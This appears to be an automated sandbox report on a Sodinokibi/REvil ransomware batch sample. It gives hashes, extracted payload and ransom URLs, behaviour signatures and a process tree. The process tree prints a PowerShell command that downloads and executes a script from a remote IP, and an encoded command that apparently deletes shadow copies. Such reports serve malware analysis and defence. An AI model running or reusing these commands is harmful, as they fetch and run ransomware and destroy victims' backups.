Analysis
-
max time kernel
149s -
max time network
143s -
platform
windows7_x64 -
resource
win7v200213 -
submitted
18-02-2020 01:10
Static task
static1
Behavioral task
behavioral1
Sample
42HVHYvi.bat
Resource
win7v200213
Behavioral task
behavioral2
Sample
42HVHYvi.bat
Resource
win10v200213
General
-
Target
42HVHYvi.bat
-
Size
192B
-
MD5
a9075a0e43612a388eda0d4643037a34
-
SHA1
6bfb53b342e2518e07955676e5a8f18717970504
-
SHA256
811d39f86a8efff6544dcd852c24a3fe2e5446f5eb7fdd9e740b424a221ab366
-
SHA512
9a9275289c65b19cc5e4d94572b1e6dfbe84c47a028193d0c142a363e0b279e0cb217d2d63c759839730ec8158460da427cb9ac354a124a9f6ae73ab7fa063ee
Malware Config
Extracted
http://185.103.242.78/pastes/42HVHYvi
Extracted
C:\8k238139d2-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/7BCBB476BE938F02
http://decryptor.cc/7BCBB476BE938F02
Signatures
-
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1992 wrote to memory of 2016 1992 cmd.exe powershell.exe PID 2016 wrote to memory of 1580 2016 powershell.exe powershell.exe PID 2016 wrote to memory of 1580 2016 powershell.exe powershell.exe PID 2016 wrote to memory of 1580 2016 powershell.exe powershell.exe PID 2016 wrote to memory of 1580 2016 powershell.exe powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 2016 powershell.exe 2016 powershell.exe 2016 powershell.exe 1580 powershell.exe 1580 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-46902564-1047598254-1287184720-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\z70531orlv90z.bmp" powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 2016 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 2016 powershell.exe Token: SeDebugPrivilege 2016 powershell.exe Token: SeDebugPrivilege 1580 powershell.exe Token: SeBackupPrivilege 1736 vssvc.exe Token: SeRestorePrivilege 1736 vssvc.exe Token: SeAuditPrivilege 1736 vssvc.exe -
Blacklisted process makes network request 32 IoCs
Processes:
powershell.exeflow pid process 1 2016 powershell.exe 7 2016 powershell.exe 8 2016 powershell.exe 10 2016 powershell.exe 12 2016 powershell.exe 13 2016 powershell.exe 15 2016 powershell.exe 17 2016 powershell.exe 19 2016 powershell.exe 21 2016 powershell.exe 23 2016 powershell.exe 25 2016 powershell.exe 27 2016 powershell.exe 28 2016 powershell.exe 30 2016 powershell.exe 34 2016 powershell.exe 37 2016 powershell.exe 39 2016 powershell.exe 40 2016 powershell.exe 42 2016 powershell.exe 44 2016 powershell.exe 46 2016 powershell.exe 48 2016 powershell.exe 49 2016 powershell.exe 51 2016 powershell.exe 53 2016 powershell.exe 54 2016 powershell.exe 56 2016 powershell.exe 58 2016 powershell.exe 60 2016 powershell.exe 62 2016 powershell.exe 64 2016 powershell.exe -
Discovering connected drives 3 TTPs 7 IoCs
Processes:
powershell.exepowershell.execmd.exedescription ioc process File opened (read-only) \??\B: powershell.exe File opened (read-only) \??\E: powershell.exe File opened (read-only) \??\F: powershell.exe File opened (read-only) \??\C: powershell.exe File opened (read-only) \??\C: cmd.exe File opened (read-only) \??\C: powershell.exe File opened (read-only) \??\A: powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Drops file in Program Files directory 37 IoCs
Processes:
powershell.exedescription ioc process File renamed C:\Program Files\WatchRepair.aifc => \??\c:\program files\WatchRepair.aifc.8k238139d2 powershell.exe File opened for modification \??\c:\program files\CompareDeny.snd powershell.exe File opened for modification \??\c:\program files\FindSave.aif powershell.exe File renamed C:\Program Files\FindSave.aif => \??\c:\program files\FindSave.aif.8k238139d2 powershell.exe File renamed C:\Program Files\InitializeHide.wma => \??\c:\program files\InitializeHide.wma.8k238139d2 powershell.exe File renamed C:\Program Files\UnprotectShow.3gp => \??\c:\program files\UnprotectShow.3gp.8k238139d2 powershell.exe File created \??\c:\program files (x86)\8k238139d2-readme.txt powershell.exe File opened for modification \??\c:\program files\RegisterEnable.png powershell.exe File renamed C:\Program Files\ResolveApprove.otf => \??\c:\program files\ResolveApprove.otf.8k238139d2 powershell.exe File renamed C:\Program Files\ConvertApprove.iso => \??\c:\program files\ConvertApprove.iso.8k238139d2 powershell.exe File opened for modification \??\c:\program files\FormatConnect.mhtml powershell.exe File renamed C:\Program Files\LockFormat.asp => \??\c:\program files\LockFormat.asp.8k238139d2 powershell.exe File opened for modification \??\c:\program files\MountPublish.wav powershell.exe File opened for modification \??\c:\program files\UnprotectShow.3gp powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\8k238139d2-readme.txt powershell.exe File opened for modification \??\c:\program files\AddStop.mpeg powershell.exe File created \??\c:\program files\microsoft sql server compact edition\8k238139d2-readme.txt powershell.exe File opened for modification \??\c:\program files\ProtectSkip.ram powershell.exe File opened for modification \??\c:\program files\UnblockExport.xltx powershell.exe File renamed C:\Program Files\UnblockExport.xltx => \??\c:\program files\UnblockExport.xltx.8k238139d2 powershell.exe File renamed C:\Program Files\AddStop.mpeg => \??\c:\program files\AddStop.mpeg.8k238139d2 powershell.exe File opened for modification \??\c:\program files\WaitCheckpoint.i64 powershell.exe File renamed C:\Program Files\ProtectSkip.ram => \??\c:\program files\ProtectSkip.ram.8k238139d2 powershell.exe File opened for modification \??\c:\program files\WatchRepair.aifc powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\8k238139d2-readme.txt powershell.exe File renamed C:\Program Files\MountPublish.wav => \??\c:\program files\MountPublish.wav.8k238139d2 powershell.exe File opened for modification \??\c:\program files\MergeRegister.pdf powershell.exe File opened for modification \??\c:\program files\InitializeHide.wma powershell.exe File opened for modification \??\c:\program files\LockFormat.asp powershell.exe File renamed C:\Program Files\FormatConnect.mhtml => \??\c:\program files\FormatConnect.mhtml.8k238139d2 powershell.exe File opened for modification \??\c:\program files\ResolveApprove.otf powershell.exe File opened for modification \??\c:\program files\ConvertApprove.iso powershell.exe File renamed C:\Program Files\CompareDeny.snd => \??\c:\program files\CompareDeny.snd.8k238139d2 powershell.exe File renamed C:\Program Files\MergeRegister.pdf => \??\c:\program files\MergeRegister.pdf.8k238139d2 powershell.exe File renamed C:\Program Files\RegisterEnable.png => \??\c:\program files\RegisterEnable.png.8k238139d2 powershell.exe File renamed C:\Program Files\WaitCheckpoint.i64 => \??\c:\program files\WaitCheckpoint.i64.8k238139d2 powershell.exe File created \??\c:\program files\8k238139d2-readme.txt powershell.exe -
Processes:
powershell.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d090000000100000042000000304006082b0601050507030406082b0601050507030106082b0601050507030206082b06010505070308060a2b0601040182370a0304060a2b0601040182370a030c6200000001000000200000000687260331a72403d909f105e69bcf0d32e1bd2493ffc6d9206d11bcd67707390b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 0400000001000000100000001d3554048578b03f42424dbf20730a3f0f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b19000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c03000000010000001400000002faf3e291435468607857694df5e45b688518681d000000010000001000000006f9583c00a763c23fb9e065a3366d55140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff20b00000001000000260000005300650063007400690067006f0020002800410064006400540072007500730074002900000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308060a2b0601040182370a030406082b0601050507030606082b0601050507030720000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604 powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E\Blob = 040000000100000010000000d63981c6527e9669fcfcca66ed05f2960f000000010000002000000071b437f087f3700ffd4e2fa46f42b6b810d7bf19adfedf951c023edd65b50b0519000000010000001000000060e2dc65295f1062e558f3fef235ed3c030000000100000014000000b51c067cee2b0c3df855ab2d92f4fe39d4e70f0e1d000000010000001000000054e2cd85ba79cda018fed9e6a863aa461400000001000000140000007c0c321fa7d9307fc47d68a362a8a1ceab075b276200000001000000200000002ce1cb0bf9d2f9e102993fbe215152c3b2dd0cabde1c68e5319b839154dbb7f553000000010000002500000030233021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070308060a2b0601040182370a030406082b0601050507030606082b060105050703070b000000010000005400000053007400610072006600690065006c006400200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f0072006900740079002000132020004700320000002000000001000000e1030000308203dd308202c5a003020102020100300d06092a864886f70d01010b050030818f310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c6531253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e3132303006035504031329537461726669656c6420526f6f7420436572746966696361746520417574686f72697479202d204732301e170d3039303930313030303030305a170d3337313233313233353935395a30818f310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c6531253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e3132303006035504031329537461726669656c6420526f6f7420436572746966696361746520417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bdedc103fcf68ffc02b16f5b9f48d99d79e2a2b703615618c347b6d7ca3d352e8943f7a1699bde8a1afd13209cb44977322956fdb9ec8cdd22fa72dc276197eef65a84ec6e19b9892cdc845bd574fb6b5fc589a51052894655f4b8751ce67fe454ae4bf85572570219f8177159eb1e280774c59d48be6cb4f4a4b0f364377992c0ec465e7fe16d534c62afcd1f0b63bb3a9dfbfc7900986174cf26824063f3b2726a190d99cad40e75cc37fb8b89c159f1627f5fb35f6530f8a7b74d765a1e765e34c0e89656998ab3f07fa4cdbddc32317c91cfe05f11f86baa495cd19994d1a2e3635b0976b55662e14b741d96d426d4080459d0980e0ee6defcc3ec1f90f10203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604147c0c321fa7d9307fc47d68a362a8a1ceab075b27300d06092a864886f70d01010b050003820101001159fa254f036f94993b9a1f828539d47605945ee128936d625d09c2a0a8d4b07538f1346a9de49f8a862651e62cd1c62d6e95204a9201ecb88a677b31e2672e8c9503262e439d4a31f60eb50cbbb7e2377f22ba00a30e7b52fb6bbb3bc4d379514ecd90f4670719c83c467a0d017dc558e76de68530179a24c410e004f7e0f27fd4aa0aff421d37ed94e5645912207738d3323e3881759673fa688fb1cbce1fc5ecfa9c7ecf7eb1f1072db6fcbfcaa4bfd097054abcea18280290bd5478092171d3d17d1dd916b0a9613dd00a0022fcc77bcb0964450b3b4081f77d7c32f598ca588e7d2aee90597364f936745e25a1f566052e7f3915a92afb508b8e8569f4 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\42HVHYvi.bat"1⤵
- Suspicious use of WriteProcessMemory
- Discovering connected drives
PID:1992 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/42HVHYvi');Invoke-OCJPTYYSX;Start-Sleep -s 10000"2⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Sets desktop wallpaper using registry
- Drops file in System32 directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
- Discovering connected drives
- Drops file in Program Files directory
- Modifies system certificate store
PID:2016 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Discovering connected drives
PID:1580
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1736